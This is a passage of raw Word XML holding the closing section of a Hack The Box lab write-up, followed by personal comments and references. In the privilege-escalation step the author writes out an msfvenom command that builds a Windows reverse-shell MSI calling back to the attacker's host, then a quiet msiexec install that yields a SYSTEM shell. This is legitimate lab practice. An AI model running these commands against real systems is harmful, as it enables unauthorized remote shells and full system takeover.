      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09BEE8CE" wp14:editId="58F8CB87">
            <wp:extent cx="6120130" cy="1717040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="188448312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83126" name="Immagine 1884483126"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1717040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DA8B39" w14:textId="1FBBB2E7" w:rsidR="00497385" w:rsidRDefault="0030670D" w:rsidP="0030670D">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc184491957"/>
      <w:r w:rsidRPr="0030670D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0030670D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D812ED">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0030670D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Info for privilege escalation manually found</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="32066005" w14:textId="5FB37E72" w:rsidR="00497385" w:rsidRDefault="0030670D" w:rsidP="00497385">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Since these permissions let me to install programs as </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>NT AUTHORITY\SYSTEM</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, I simply created a payload with MSFVenom running the command: </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.9 lport=7764 -f msi &gt; shell.msi</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. I uploaded it on the target and executed it running the command: </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>msiexec /quiet /qn /i exploit.msi</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. In this way I obtained a shell as </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>NT AUTHORITY\SYSTEM</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and I retrieved the root flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784328EF" w14:textId="77777777" w:rsidR="0030670D" w:rsidRDefault="0030670D" w:rsidP="0030670D">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5406ACF4" wp14:editId="08DA472D">
            <wp:extent cx="4709160" cy="2840252"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="117979856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98566" name="Immagine 1179798566"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4716745" cy="2844827"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D1345B" w14:textId="609E36B7" w:rsidR="0030670D" w:rsidRDefault="0030670D" w:rsidP="0030670D">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc184491958"/>
      <w:r w:rsidRPr="0030670D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0030670D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D812ED">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0030670D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Privilege escalation and root flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="6F78F037" w14:textId="56B58E78" w:rsidR="00633AD3" w:rsidRDefault="003A2D2C" w:rsidP="00760EB9">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc184491968"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Personal comments</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="1BA73819" w14:textId="4DDB9586" w:rsidR="00633AD3" w:rsidRDefault="0030670D" w:rsidP="00633AD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I really enjoyed this box because has some interesting points. It was very interesting to find a subdomain and a possible username (but it was useless) in the SSL certificate. I could find the subdomain reading better the nMap scan results too. So, I learnt a different place where to search useful information. Also, it was very interesting the way to escalate privileges. It was the first time I found this path and it is in my know-how now. So, as I said, I enjoyed this box which teach me something new. I rated it as Easy on Hack The Box platform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416C94C3" w14:textId="26762776" w:rsidR="00760EB9" w:rsidRDefault="00760EB9" w:rsidP="00760EB9">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc184491969"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="58E5053F" w14:textId="42BC89BA" w:rsidR="0030670D" w:rsidRDefault="0030670D" w:rsidP="00FA0C91">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00061C24">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://book.hacktricks.xyz/network-services-pentesting/135-pentesting-msrpc</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05241344" w14:textId="69681470" w:rsidR="00633AD3" w:rsidRPr="00633AD3" w:rsidRDefault="0030670D" w:rsidP="00FA0C91">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15" w:anchor="basic-uac-bypass-full-file-system-access" w:history="1">
        <w:r w:rsidRPr="00061C24">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="00633AD3" w:rsidRPr="00633A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A5952"/>
    <w:rsid w:val="00221BBD"/>
    <w:rsid w:val="00253185"/>
    <w:rsid w:val="0030670D"/>
    <w:rsid w:val="003354CC"/>
    <w:rsid w:val="003A2D2C"/>
    <w:rsid w:val="003C423B"/>
    <w:rsid w:val="003E7890"/>
    <w:rsid w:val="0047475B"/>
    <w:rsid w:val="004917A9"/>
    <w:rsid w:val="00497385"/>
    <w:rsid w:val="004B1DB7"/>
    <w:rsid w:val="004E245C"/>
    <w:rsid w:val="00507AF9"/>
    <w:rsid w:val="00513674"/>
    <w:rsid w:val="00534027"/>
    <w:rsid w:val="005702DD"/>
    <w:rsid w:val="005D07C6"/>
    <w:rsid w:val="00626D66"/>
    <w:rsid w:val="00633AD3"/>
    <w:rsid w:val="006D481D"/>
    <w:rsid w:val="006F4E0C"/>
    <w:rsid w:val="00760EB9"/>
    <w:rsid w:val="00786806"/>
    <w:rsid w:val="00834445"/>
    <w:rsid w:val="00862459"/>
    <w:rsid w:val="008E6D55"/>
    <w:rsid w:val="008F0C16"/>
    <w:rsid w:val="00905682"/>
    <w:rsid w:val="00915D60"/>
    <w:rsid w:val="009A4998"/>
    <w:rsid w:val="009E1538"/>
    <w:rsid w:val="00A84B06"/>
    <w:rsid w:val="00AC7714"/>
    <w:rsid w:val="00AD3DCE"/>
    <w:rsid w:val="00AE7EC9"/>
    <w:rsid w:val="00B40109"/>
    <w:rsid w:val="00B672A4"/>
    <w:rsid w:val="00B95A87"/>
    <w:rsid w:val="00BC3B9E"/>
    <w:rsid w:val="00CB3015"/>
    <w:rsid w:val="00CD62ED"/>
    <w:rsid w:val="00D0225B"/>
    <w:rsid w:val="00D23825"/>
    <w:rsid w:val="00D265A3"/>
    <w:rsid w:val="00D812ED"/>
    <w:rsid w:val="00DB3E6E"/>
    <w:rsid w:val="00DF6E5C"/>
    <w:rsid w:val="00DF72E4"/>
    <w:rsid w:val="00E11AAF"/>
    <w:rsid w:val="00EA2EBA"/>
    <w:rsid w:val="00EF34C6"/>
    <w:rsid w:val="00F47EF9"/>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book.hacktricks.xyz/windows-hardening/windows-local-privilege-escal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ook.hacktricks.xyz/network-services-pentesting/135-pentesting-msrpc"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1016</Words>
  <Characters>5795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2024-12-07T18:26:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-12-07T17:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-07T18:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>